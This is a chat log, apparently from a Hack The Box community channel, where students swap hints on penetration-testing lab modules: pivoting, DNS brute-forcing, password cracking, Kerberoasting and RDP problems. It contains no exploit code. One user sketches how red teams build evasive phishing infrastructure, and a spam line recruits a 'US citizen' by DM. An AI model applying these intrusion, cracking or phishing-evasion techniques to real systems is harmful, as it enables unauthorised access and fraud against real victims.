I found the || notes.txt || with the IPv6 for || WSUS || along with a password, probably for || Arturo ||.
I'm trying to move laterally to || WSUS || using that user, but I cannot seem to find an efficient & reliable way to scan that machine's port to figure how to move to it with the credentials I found.
Tried proxychains + nmap but it's too slow, and when I try to make it faster It becomes unreliable (at least from what I can tell).
proxychains + rustscan does not work as it seems to not have support for IPv6.
Ligolo-NG does not have support for IPv6 too.
What is a reliable & faster method to scan the ports of that machine?
I did not learn powershell yet, tried some powershell scripts from ChatGPT to scan from the pivot host to make it faster but they are broken.
Any ideas would be appreciated.
ok so it's asking for the FQDN of a host
so first do a zone transfer on the domain
it should give you like 2-3 sub domains
my name
then run a bruteforce on each subdomain, looking for the host
the wordlist you should be using is in /opt/seclists/Discovery/DNS/
I wont tell which one but it starts with an F
this image helped me understand which part of the process I was at
I need help in rdping a target ip. im using my own vm with htb academy vpn. I'm in module "Pentest in a Nutshell" where i have to use xfreerdp tool to answer one of the question at the end of the section and im getting these errors
which section of the Pentest in a Nutshell module are you working on?
windows system enumeration
i checked htb help articles , went through sites to see if i could find a solution. Pretty much did everything i could from my end. It didn't work out. it's been 4-5 days since this started
Double check the IP address, additionally, you can issue a reset on the target and try again. Also, make sure to check if you are connected to the appropriate VPN server
can someone give me some pointers again for password attack skill assessment? im stuck
is there anyone else who is facing issue with AEN labs ? the response from the machines gets delayed every now and then.
I have tried resetting the machine a multiple times and changing the VPN file to
Shoot
Where are you?
@grizzled schooner i have passwords generated from the database, however i dont know what they are for. lol. i cant rdp with them, i tried the jump box im on, no clue what to do
What question are you on?
skill assessment, whats the ntlm of nexura\administrator
Okay, sec
🤚 Looking for a US citizen — great rewards await. D!!!M if interested!
@heavy dome you seem to have done this module before.
Can you please help me out?
How did you find out that the port for || RDP || on || WSUS || is || 43389 || ?
Ad skill assessment cracking first hash = not getting result with rockyou did I make some other mistake or they want us to try rules etc.
I would say to enumerate the host you do have access to for specific things you read in that file you found. If you are still not getting anywhere you can DM.
Hello, Login Brute Force Module, Custom Wordlists --> I do not know why, but all the time I use hydra, it's extremely slow in comparison to ffuf for bruteforcing... [STATUS] 16.00 tries/min, 16 tries in 00:01h, 111270 to do in 115:55h, 16 active
[STATUS] 5.33 tries/min, 16 tries in 00:03h, 111270 to do in 347:44h, 16 active. Does anyone know a common issue here?
Thank you.
Finally got the answer after 2 days LOL.
Hello! I was working on this module some time ago but didn't finish it because I decided to take the CPTS exam. I remember struggling quite a bit, however, using Ligolo-NG might make it easier, but I can't remember the details very well at the moment.
Module: Advanced SQL Injections
Section: skills assessment
Hello everyone!
Got stuck on second question.
I am almost there and would want some help
Thanks but I got the answer after a lot of struggle lol
What do you need help with?
Can I DM to you?
Sure
Please, can someone help me with the Skills Assessment - Password Attacks module, I've been stuck for 3 days and I'm not sure what I should do.
This is the lab where you have to get the NTLM hash from NEXURA/Administrator, with the machines DC01, FILE01, JUMP01 and DMZ01.
@scenic karma easy medium or hard lab?
There are no difficulties, it's just a laboratory
Maybe they changed it since ive last done it.
Anyone else had issues with RDP into the yara/sigma module on the soc path? ive been trying tons of different things. Sometimes i get connected but dropped after a minute. I can't seem to get anything to connect.
It could be, I've seen people saying that they changed it not long ago.
what step are you stuck at? I posted a list of hints a while back
Look, I have access to JUMP01 with hwilliam pivoting via ssh with the DMZ01 machine, but I start looking for files or credentials (because without being admin I can't dump anything with mimikatz, etc.) and I don't find anything. I imagine it's managed with the password manager that JUMP01 has, but I can't find any master password.
sharing is caring 😉
(this is a hint btw) ^
a xD
Do you understand everything I've explained?
It's probably making things much more complicated than what it's asking for. It's happened to me in all the labs, but this one is weird, haha.
i know where you're at this is why i gave the hint that i did
(also did you check hashcat for potential modes if you already got the one thing)
But what's hashcat for? I still don't have any hashes as such. I only have remote access to JUMP01, SMB to DC01 with smbclient, and from RDP to JUMP01 I can access the FILE01 netshares.
I found a supposed administrator password in JUMP01's /Temp but the password doesn't work anywhere, and I don't know what else I can do xD
could someone go give me a sanity check
https://academy.hackthebox.com/module/234/section/2571
I keep getting kicked out of this RDP session after about a minute. Idk what to do
hey, can someone help me on the skill assessment of using crackmapexec ? im stuck at question 3 for quite a while now . i have control over SQL01 need to get to DEV01
Can anyone help me out here? "While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} )"
idk looks like it's broken
none of them return anything
looking through chat history. there were problems before with this one
might be just me
Hi everyone! Guys, what should I do? I can’t connect via RDP even though the port is open. It looks like the problem is that x11-xserver-utils isn’t installed, but I can’t install it because I don’t have root privileges.
https://academy.hackthebox.com/module/147/section/1356
Skills Assessment - Password Attacks
What are you doing dude?
Ahm guyz, what is this server for? I came by reading the name actually
did you do the ssh -D?
Yes
It's for discussion of HTB and their various platforms.
ssh doesn't carry over X11 Display properties
Hello
@fair merlin Please don't post flags
That is the image given in the module
Yea, it was in the module
It's not a flag
But why does it work despite having odd number of parenthesis though?
Does HTB plan to release any modules related to phishing infrastructure?
Hi all. Doing the Password Attacks module. At Cracking protected Archives, when trying to do the "Cracking Bitlocker" first question, I try to replicate what was in the material. But after running Hashcat for over 15 minutes, I still cannot "crack" the hash. What am I doing wrong?
What is "phishing infrastructure"?
Nowadays, it's very easy to detect phishing campaigns, so you have to build an entire infrastructure geared toward evasion, modify the DOM, TLS certificates, CDN, modify the code of tools like evilginx2 or gophish, etc.
Maldev Academy has a course for this, and it's quite comprehensive, but it would be nice if HTB also had a mini-module, at least an introductory one.
Ok. Starting to feel what the term means.
Still odd I never heard of it.
Not convinced yet. The "infrastructure" word does not rhyme yet. But willing to learn every day of course. 🙂
Then again, I am oldskool. So Infrastructure might mean something else for me.
I hate bumping, but will do it now anyway. Forgive me. Hi all. Doing the Password Attacks module. At Cracking protected Archives, when trying to do the "Cracking Bitlocker" first question, I try to replicate what was in the material. But after running Hashcat for over 15 minutes, I still cannot "crack" the hash. What am I doing wrong?
Real red teams setup phishing infrastructure to automatically deploy. usually it consists of building the main phishing servers which serve the reverse proxy/fake landing page, then block all traffic to them except for proxy servers where you have your victims visit. You then blacklist all IP addresses except from your target to help against discovering your actual infrastructure. There's actually a lot more to it too, so yeah phishing infrastructure just refers to the whole setup.
Ok, I will read up on it.
Still a useless exercise though.
I said that out of context. I meant that educating employees about it seems mostly useless.
I am unable to find the user in the section "Credential Hunting in Network Shares" and module "Password Attacks" I used tool snaffler but it gave a lot of output I am confused right now how do I proceed forward now I am checking the data manually ??
J
Did you finish the skills assessment, I need help 🙁
Hey in this group do you learn or talk about Ethical hacking ?
Yep. It's about the Hack The Box platform.
@cloud urchin can u please help
Thank you
I have a question about: how to make money from ethical hacking
What is hack the box about
some bug hunter platform like hackone, if u r professional enough u can get money from it
sorry i haven't done the updated password attacks module
Thanks
i just lookedup and used ligolo-ng
Can any one tell how to solve this issue "The trust relationship between this workstation and the primary domain failed." in Windows Attack & Defense Module
huh payload and shell modules makes my brain sick 
try not to randomly DM people ^^
👍
has anyone ran into this issue? i've googled for the past 2 days and nothing online works for me
In the section Windows Lateral Movement - RDP (https://academy.hackthebox.com/module/263/section/3084) there is the following sentence:
"Once we confirm Restricted Admin Mode is enabled, or if we can enable it, we can proceed to perform Pass the Hash or Pass the Ticket attacks with RDP."
Shouldn't this be the other way around or am i misunderstanding? I thought that Restricted Admin Mode had to be disabled (meaning that DisableRestrictedAdmin = 1) so that an admin can connect / use PtH?
Academy platform is down or just me?
I am in Active Directory enumeration and attacks in the Kerberoasting from Linux section . However I have no valid set of credentials so how can I perform the kerberoasting attack?